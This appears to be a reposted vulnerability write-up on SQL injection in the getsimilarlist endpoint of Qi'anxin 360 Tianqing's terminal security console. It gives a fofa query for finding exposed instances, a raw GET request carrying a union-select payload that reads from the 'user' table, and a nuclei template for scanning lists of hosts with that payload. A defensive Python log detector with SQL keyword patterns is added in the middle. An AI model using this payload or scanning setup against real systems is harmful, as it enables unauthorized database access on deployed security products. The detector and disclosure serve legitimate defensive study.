Qi'anxin 360 Tianqing's getsimilarlist has a SQL injection vulnerability

Disclaimer: Please do not use the techniques in this article for illegal testing. Any direct or indirect consequences and losses caused by disseminating or using the information or tools provided here are the sole responsibility of the user and have nothing to do with the author of the article. This article is for educational purposes only.

1. Product description

Qi'anxin Tianqing is the terminal security management system (hereafter "Tianqing") of Qi'anxin Group, a product focused on integrated terminal security solutions. Through a "systematic defense, digital operation" approach it helps government and enterprise customers accurately identify, protect and supervise terminals, and ensures that those terminals can access data and business systems in a trustworthy, secure and compliant way at any time [1]. [2] Tianqing is built on Qi'anxin's new "Trantuo" terminal security platform, which integrates high-performance virus scanning, vulnerability protection and active defense engines, and deeply integrates innovative technologies such as threat intelligence, big data analysis and security visualization. Through system compliance and hardening, threat prevention and detection, operation and maintenance control and audit, terminal data leakage prevention, unified management and operation, and other functions, it helps government and enterprise customers build sustained and effective terminal security capabilities.

2. Vulnerability description

The `/api/client/getsimilarlist` endpoint of Qi'anxin 360 Tianqing does not sanitize its `status` parameter before using it in a database query, which results in a SQL injection vulnerability.


3. Vulnerability reproduction

fofa: banner="QiAnXin web server" || banner="360 web server" || body="appid\":\"skylar6" || body="/task/index/detail?id={item.id}" || body="Expired or unauthorized, please contact 4008-136-360 to purchase"

1. Manual reproduction

LITTLE

GET /api/client/getsimilarlist?status%5B0,1%29+union+all+select+%28%2F%2A%2150000select%2A%2F+79787337%29%2C+setting%2C+setting%2C+status%2C+name%2C+create_time+from+%22user%22+where+1+in+%281%5D=1&status%5B0%5D=1 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.667.76 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/json

BURP screenshot
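The request above is what the injection looks like on the wire; what a defender of a Tianqing console wants is to recognize it in the web server's access log. The following is an added example written for this page, not code from Qi'anxin or from the original post. It assumes the server writes requests in the standard "combined" log format, URL-decodes every `status[...]` parameter sent to `/api/client/getsimilarlist`, flags array keys or values that are not plain integers or that contain SQL syntax, and runs that check over a few constructed sample log lines (documentation IP range, made-up timestamps). The nuclei template later in the post sends the same request, so one check covers both the manual and the automated variant.

```python
"""
Access-log detector for injection attempts against /api/client/getsimilarlist.
Added example for this write-up; it is not Qi'anxin code and it assumes the
web server writes the request line in the common "combined" log format.
"""
import re
from typing import List, Tuple
from urllib.parse import parse_qsl, urlsplit

VULN_PATH = "/api/client/getsimilarlist"

# client, timestamp, request line, response status (combined log format, assumed)
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# A benign status[<index>] key and a benign status value are small integers
INT_RE = re.compile(r"^\d+$")
# Tokens that appear in the published payload and never in a legitimate parameter name
SQL_HINT_RE = re.compile(r"union|select|/\*!|--|[\"';]", re.IGNORECASE)

# The exact query string from the write-up above, used here only as sample input
ATTACK_QUERY = (
    "status%5B0,1%29+union+all+select+%28%2F%2A%2150000select%2A%2F+79787337%29%2C"
    "+setting%2C+setting%2C+status%2C+name%2C+create_time+from+%22user%22+where+1+in"
    "+%281%5D=1&status%5B0%5D=1"
)


def inspect_target(target: str) -> List[str]:
    """Return finding codes for one request target; an empty list means benign.

    Only the vulnerable endpoint is inspected. The injection in the write-up sits
    in the parameter *name* (status[...]), so names are checked as well as values.
    """
    parts = urlsplit(target)
    if parts.path != VULN_PATH:
        return []
    findings: List[str] = []

    def note(code: str) -> None:
        if code not in findings:
            findings.append(code)

    # parse_qsl percent-decodes names and values and turns '+' into spaces
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        m = re.fullmatch(r"status\[(.*)\]", name, re.DOTALL)
        if m is not None and not INT_RE.match(m.group(1)):
            note("non-integer-array-key")   # e.g. "0,1) union all select ..."
        if SQL_HINT_RE.search(name):
            note("sql-syntax-in-name")
        if name.startswith("status") and not INT_RE.match(value):
            note("non-integer-value")
    return findings


def scan_log(lines) -> List[Tuple[str, str, List[str]]]:
    """Run inspect_target over access-log lines; return (client, timestamp, findings) per hit."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue
        findings = inspect_target(m["target"])
        if findings:
            hits.append((m["client"], m["ts"], findings))
    return hits


# Constructed sample log lines: one benign call, the published payload, an unrelated path
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Nov/2023:08:15:02 +0800] "GET /api/client/getsimilarlist?status%5B0%5D=1&status%5B1%5D=2 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Nov/2023:08:15:40 +0800] "GET /api/client/getsimilarlist?' + ATTACK_QUERY + ' HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Nov/2023:08:16:01 +0800] "GET /task/index/detail?id=5 HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for client, ts, findings in scan_log(SAMPLE_LOG):
        print(f"{ts} {client} {VULN_PATH}: {', '.join(findings)}")
```

Run it as a script to print the hits, or import `scan_log` into a larger log pipeline. The allowlist part (integer index, integer value) is the durable check: it does not depend on the specific payload, and it is also the validation the endpoint itself should perform before the parameter reaches the query. The keyword pattern only labels the payload published here and will not catch every variant.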


2. Automated reproduction

① nuclei scan

```yaml
id: qianxin-360-tianqing-getsimilarlist-sqli-rce

info:
  name: qianxin-360-tianqing-getsimilarlist-sqli-rce
  author: m0be1
  severity: high
  tags: qianxin,sqli,iot
  description: 奇安信360天擎getsimilarlist存在SQL注入漏洞
  metadata:
    fofa-query: banner="QiAnXin web server" || banner="360 web server"  || body="appid\":\"skylar6" || body="/task/index/detail?id={item.id}" || body="已过期或者未授权,购买请联系4008-136-360"
    verified: true
    max-request: 1

http:
  - raw:
      - |
        GET /api/client/getsimilarlist?status[0,1%29+union+all+select+%28%2F%2A%2150000select%2A%2F+79787337%29%2C+setting%2C+setting%2C+status%2C+name%2C+create_time+from+%22user%22+where+1+in+%281]=1&status[0]=1 HTTP/1.1
        Host:
        User-Agent: Mozilla/5.0

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "list"
          - "total"
          - "reason\":\"success"
        part: body
        condition: and

      - type: word
        part: header
        words:
          - "application/json"
```

nuclei.exe -t qianxin-360-tianqing-getsimilarlist-sqli.yaml -l subs.txt -stats


② Xiaolong POC detection

Xiaolong's POC test passes, very good.

Tool download address

Xiaolong POC portal: Xiaolong POC tool


Origin blog.csdn.net/holyxp/article/details/134306103